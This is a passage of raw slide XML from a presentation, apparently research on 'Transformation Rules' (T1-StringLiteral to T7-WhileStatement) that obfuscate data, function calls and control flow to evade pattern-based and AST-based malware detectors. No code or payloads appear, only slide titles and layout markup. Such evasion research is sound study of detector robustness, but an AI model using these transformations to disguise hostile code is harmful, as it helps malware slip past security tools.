                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2282233"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to modify the calling context used by AST-based detectors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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="739933"/>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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370184" cy="3597597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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T1-StringLiteral</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T2-ArrayInitialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T3-FunctionName</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T4-CallExpression (a)</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T4-CallExpression (b)</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T5-IfStatement</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T6-ForStatement</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T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Google Shape;39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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2032000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2282233"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to modify the calling context used by AST-based detectors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xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="739933"/>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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370184" cy="3597597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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T1-StringLiteral</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T2-ArrayInitialization</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T3-FunctionName</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4-CallExpression (a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>T4-CallExpression (b)</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T5-IfStatement</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T6-ForStatement</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T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2032000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="403" name="Google Shape;403;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2282233"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to modify the calling context used by AST-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406;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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="739933"/>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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370184" cy="3597597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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T1-StringLiteral</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T2-ArrayInitialization</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T3-FunctionName</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T4-CallExpression (a)</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T4-CallExpression (b)</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T5-IfStatement</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T6-ForStatement</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T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2032000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Google Shape;417;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2282233"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>function calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>to modify the calling context used by AST-based detectors</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3508504"/>
            <a:ext cx="464213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C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>control flows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove control-flow information used by detectors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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="739933"/>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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370184" cy="3597597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
